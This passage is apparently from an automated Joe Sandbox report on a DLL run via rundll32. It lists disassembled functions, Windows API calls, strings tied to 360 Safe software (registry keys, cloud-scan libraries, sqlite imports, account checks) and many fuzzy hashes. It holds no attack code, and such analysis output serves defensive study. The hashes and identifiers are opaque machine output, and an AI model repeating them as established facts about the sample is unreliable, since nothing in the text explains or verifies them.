                                                                  • Instruction ID: 90789e0161200a82d414c2e2bf23b1b10d1e56c07e73b18e3e2605f8b4aac2a4
                                                                  • Opcode Fuzzy Hash: 5c5709e5d7299c401f45f5ffd4562792fd3562d72889c1e19fc8d239cebed65d
                                                                  • Instruction Fuzzy Hash: EA918C32A04A8892E7A2CF75C5053ED6761F7987C8F459202EF8D2769ADF75D78AC300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180010B58 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 146registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010BE9
                                                                  • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010C46
                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010D0F
                                                                  • ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180010D31
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010D3B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValuememmove
                                                                  • String ID: 360scan
                                                                  • API String ID: 1121107697-2450673717
                                                                  • Opcode ID: 220e67dd3970d468599f7a797be11ec42a8334a823f280886d40bb2abff1120a
                                                                  • Instruction ID: 8412be06b917c2556790a81d519247f335b1f81f587c3bd72331bc97ccab05af
                                                                  • Opcode Fuzzy Hash: 220e67dd3970d468599f7a797be11ec42a8334a823f280886d40bb2abff1120a
                                                                  • Instruction Fuzzy Hash: B551F336700A4889FBA6CBB5E8107ED3760BB487E8F548215EEA917B95DF74C649C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018008023C Relevance: 10.6, APIs: 7, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionThrow$??3@
                                                                  • String ID:
                                                                  • API String ID: 3542664073-0
                                                                  • Opcode ID: 4077b6000bdbe81cdcb22badff92ad6060c6f4ec82431c923b1cffb770fd83d1
                                                                  • Instruction ID: f77bb453ddad34bb426a0367fc3509630a9405fc871705a0e6efaa82900c553f
                                                                  • Opcode Fuzzy Hash: 4077b6000bdbe81cdcb22badff92ad6060c6f4ec82431c923b1cffb770fd83d1
                                                                  • Instruction Fuzzy Hash: 35216A72B00A88C9E75DFE33B8423EB6212ABD87C0F18D435BA594B69BDE25C5168740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180066C3C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0000000180066CBF
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: DebugDebuggerErrorLastOutputPresentStringmemset
                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                  • API String ID: 1848478996-631824599
                                                                  • Opcode ID: 9f3b69b346ce0167d1f9eabdb45a87455ea8902d3636c2fa194e63da2080b7c6
                                                                  • Instruction ID: 5420fd47393a03a9017ccb442b178d5ad27f9d1acba3036b184651f5d30fce96
                                                                  • Opcode Fuzzy Hash: 9f3b69b346ce0167d1f9eabdb45a87455ea8902d3636c2fa194e63da2080b7c6
                                                                  • Instruction Fuzzy Hash: FC117032710B4997F7869B22EE453E932A1FB58395F50C125E75982AA0EF3CD67CC710
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180082A18 Relevance: 7.6, APIs: 6, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionThrow
                                                                  • String ID:
                                                                  • API String ID: 432778473-0
                                                                  • Opcode ID: 51705d7ffc1c5a9faf17d18654f459016f05baa871bea5d42b40ed88e15a0c9d
                                                                  • Instruction ID: 0cc55a271704fcaf4879220f63c9cc24c35a4ef39e1216f676686ee34d186413
                                                                  • Opcode Fuzzy Hash: 51705d7ffc1c5a9faf17d18654f459016f05baa871bea5d42b40ed88e15a0c9d
                                                                  • Instruction Fuzzy Hash: CE118471714A88C9E75EFE33A8027EB5312ABDC7C0F14D434B9894B65BCF25C6164300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180062600 Relevance: 5.2, APIs: 4, Instructions: 248COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memmovememset
                                                                  • String ID:
                                                                  • API String ID: 1288253900-0
                                                                  • Opcode ID: 25317eca67bb0a3083e8d95f7975eeecdd6a0a887f58df33bf998c20beef77dc
                                                                  • Instruction ID: 53b279b989bf8eb66429a88fea8492b1387e1814281b1786c9cbc4725fb6e079
                                                                  • Opcode Fuzzy Hash: 25317eca67bb0a3083e8d95f7975eeecdd6a0a887f58df33bf998c20beef77dc
                                                                  • Instruction Fuzzy Hash: 56A1A273A146D48FD795CF79D8407AC7BE1F389788F548126EA9997B48EB38C205CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018006A2C8 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ControlDevice
                                                                  • String ID:
                                                                  • API String ID: 2352790924-0
                                                                  • Opcode ID: a66e1d163aca22c0d64387c7a093102cf96f82ef91a8c2df69456084ab1fc6cd
                                                                  • Instruction ID: 1e54cb40d621f6ee58c2f67f74a10768d1db0efbd2ae079103c51a30650bf8b3
                                                                  • Opcode Fuzzy Hash: a66e1d163aca22c0d64387c7a093102cf96f82ef91a8c2df69456084ab1fc6cd
                                                                  • Instruction Fuzzy Hash: 68D04276928B84CBD6A09B18F48430AB7A0F388794F501215EBCD46B29DB3CC2558F04
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180060FE0 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 126libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID: sqlite3_bind_blob$sqlite3_bind_int$sqlite3_bind_int64$sqlite3_bind_parameter_index$sqlite3_bind_text16$sqlite3_close$sqlite3_column_blob$sqlite3_column_bytes$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text16$sqlite3_exec$sqlite3_finalize$sqlite3_open16$sqlite3_prepare16_v2$sqlite3_reset$sqlite3_step
                                                                  • API String ID: 190572456-2634604785
                                                                  • Opcode ID: c6900063e6f1f58e840ab128dafbd2c95afe69325bb9c3ee8f7ad832e163feb1
                                                                  • Instruction ID: 5824c6e44f34b1b970dc4f09c8d16c86c5da5fb83a6df47551891ccc5cd06f94
                                                                  • Opcode Fuzzy Hash: c6900063e6f1f58e840ab128dafbd2c95afe69325bb9c3ee8f7ad832e163feb1
                                                                  • Instruction Fuzzy Hash: D351A271201F4EA5EF968BA4E8913D833A1FB4CBD7F19D125A92D46364EF38C698C710
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018005AC40 Relevance: 45.7, APIs: 18, Strings: 8, Instructions: 242COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Clear$Init
                                                                  • String ID: //root/config/item$install_first_open$name$pop_count$propoganda$tray_startup$update_first_open$value
                                                                  • API String ID: 3740757921-2166998829
                                                                  • Opcode ID: da0fe18e004557cc7b0f2f3d8356101b6c2bfabc220260c257d30514f78ba6f4
                                                                  • Instruction ID: aff580d4b75deea64deb7e46e4065f56afbdc634fa72071d76af76b76e89fc57
                                                                  • Opcode Fuzzy Hash: da0fe18e004557cc7b0f2f3d8356101b6c2bfabc220260c257d30514f78ba6f4
                                                                  • Instruction Fuzzy Hash: CDB12A72705A09DAFB95CF65D8903EC27B0FB49B99F149421FA0EA3A64DF35CA48C340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018006442C Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 170libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$CriticalSectionmemset$AppendPath$??3@CountEnterErrorFileFreeInitializeLastLeaveLibraryModuleNameSpin
                                                                  • String ID: ..\deepscan\$360Safe$360util$QueryFileCancel$QueryFileClose$QueryFileCreate$QueryFilesEx2$QuerySetOption$cloudcom2.dll
                                                                  • API String ID: 1015768321-2684063875
                                                                  • Opcode ID: 75acf276f5303c209b0e6b56f5e71fa6dc54d5f9daca34d9052b038fe3a01ebd
                                                                  • Instruction ID: 85df055bf9425c6c0da70963d94a526d831783e1f19dc8973dcfbc1a34099653
                                                                  • Opcode Fuzzy Hash: 75acf276f5303c209b0e6b56f5e71fa6dc54d5f9daca34d9052b038fe3a01ebd
                                                                  • Instruction Fuzzy Hash: B2818032301B8896EBA6DF21ED403D933A5FB497D4F548125EA5A0BBA4DF38D768C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180066428 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 103registrylibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Close$FreeLibraryOpenPathQueryValuememset$AddressAppendExistsFileHandleModuleProc
                                                                  • String ID: Init$Path$SOFTWARE\360Safe\360Ent$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$ServiceCall$\entclient\EntSvcCall_x64.dll
                                                                  • API String ID: 1498439332-702965266
                                                                  • Opcode ID: 7287dc7089829755e66462901955348d5673694c8cc533bc2c05e2a633cd80c9
                                                                  • Instruction ID: 4281fb2f7f8363f35efb0fd70a638a071d20137889dcc292f685ea46b841f4e2
                                                                  • Opcode Fuzzy Hash: 7287dc7089829755e66462901955348d5673694c8cc533bc2c05e2a633cd80c9
                                                                  • Instruction Fuzzy Hash: 74513E32614B4996EF918F20E8557DA73A0F7897C4F549116BA9F06A79EF38C74CCB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180024CD4 Relevance: 32.0, APIs: 6, Strings: 12, Instructions: 490COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: wcsstr$ExtensionFindPath_wcsicmp_wtoiwcschr
                                                                  • String ID: CLSID$InprocHandler$InprocHandler32$InprocServer$InprocServer32$LocalServer$LocalServer32$Server$ShellExecute$\\?\$gfffffff$gfffffff
                                                                  • API String ID: 3861457700-2318594275
                                                                  • Opcode ID: 1a717cbbda8cc80c3c9297c878bbbc669d8a73a80a9fe28ac877bfe538569426
                                                                  • Instruction ID: f5eaf3cd70d8a4233fc3eb4f5baabc932733307175318797ea3a634ab2d80fd0
                                                                  • Opcode Fuzzy Hash: 1a717cbbda8cc80c3c9297c878bbbc669d8a73a80a9fe28ac877bfe538569426
                                                                  • Instruction Fuzzy Hash: 3A12B672301A4886EB92DF39C8407DD23A1FB85BE5F44D211EA6D576E9EF78CA48C704
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180017114 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 278sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleep
                                                                  • String ID: ..\$..\cloudcom264.dll$..\deepscan\cloudcom264.dll$CreateObject
                                                                  • API String ID: 4250438611-3269604003
                                                                  • Opcode ID: b26729f86dd87614dde1f224353b88e55a5d4336fc5642cbf555589fae585a1a
                                                                  • Instruction ID: 779814ae67fce754565a54a050c1806dc9f81f57e114568d0bd2b2f20499cc86
                                                                  • Opcode Fuzzy Hash: b26729f86dd87614dde1f224353b88e55a5d4336fc5642cbf555589fae585a1a
                                                                  • Instruction Fuzzy Hash: 0CC16D72301F4882EB969B29D84479D33B1F788BE4F458215FA2E437A5EF38CA49C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180056DE8 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 118COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_wcsicmp$AppendCriticalPathSectionValue$EnterFileLeaveModuleName
                                                                  • String ID: 360ExtHost$PCInfo$Partner$SOFTWARE\Wow6432Node\360EDRSensor$SOFTWARE\Wow6432Node\360EntSecurity$SOFTWARE\Wow6432Node\360SD$SOFTWARE\Wow6432Node\360Safe\Coop$ipartner$pid
                                                                  • API String ID: 3226263223-3142758636
                                                                  • Opcode ID: 628566989c82da212381fb3148179b37bd681cc2eaf5be604a1b5c7982e4b541
                                                                  • Instruction ID: 9533c192c26b347b8b9675f8c4be5ba0e6f9fe9a3a5b632a6bc0f6ba07ebb3e1
                                                                  • Opcode Fuzzy Hash: 628566989c82da212381fb3148179b37bd681cc2eaf5be604a1b5c7982e4b541
                                                                  • Instruction Fuzzy Hash: CF419D31A00A0C94FB96DB22A8403D963A4F74DBE4F909225FD28677A5EF39C74EC340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180044F64 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 320COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Count_cwprintf_s_lmemset$??3@Tickmemmove$??2@CriticalErrorHeapInitializeLastProcessSectionSpinrandsrand
                                                                  • String ID: 0=%s$360safe$DomainQuery$[%s]$com$mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%s$router$router:1
                                                                  • API String ID: 1789426470-3446598425
                                                                  • Opcode ID: 61786b1980ef7039dc4211af90e47e9a0e74f34993d56612bf85e9d061f4368c
                                                                  • Instruction ID: 6d6f9855de1d8c5247af129e1c82467daf937bd8777ee679c9f2b2c93b700a4d
                                                                  • Opcode Fuzzy Hash: 61786b1980ef7039dc4211af90e47e9a0e74f34993d56612bf85e9d061f4368c
                                                                  • Instruction Fuzzy Hash: D8D19132204F4882EB419B69D8803DE73A0F789BE5F108226BAAD477E5DF78C649C704
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018004C034 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 112memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: wcscmp$Token$GlobalInformationProcess$AccountAllocCloseCurrentErrorFreeHandleLastLookupOpen
                                                                  • String ID: LOCAL SERVICE$NETWORK SERVICE$NT AUTHORITY$SYSTEM
                                                                  • API String ID: 3141378966-199577007
                                                                  • Opcode ID: 8d6976f719ecb46038f7faa6d62441ad30095ab4bbf55d005c38fee77e3359ad
                                                                  • Instruction ID: cee3605f7c7adaec53412b2e982fb153fefebb873c81ca2b5be3308eddbb09f0
                                                                  • Opcode Fuzzy Hash: 8d6976f719ecb46038f7faa6d62441ad30095ab4bbf55d005c38fee77e3359ad
                                                                  • Instruction Fuzzy Hash: F2517C32604B4986EBE28F14E8847DA73A5F78D7D8F518125EA5D436A4DF39C70DCB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018003AC1C Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 107COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AppendPath$FileModule$Namememset$AttributesHandle
                                                                  • String ID: ..\$..\deepscan\$bapi64.dll
                                                                  • API String ID: 2144934147-2390674060
                                                                  • Opcode ID: 9d5beebac642680a506550c8be48c190e39914ceb82cb04c52bb84f1375e2870
                                                                  • Instruction ID: 18b05e09174244348b6cef7f8f2b1baf28e5037f203e247325d4c6a64b139c1b
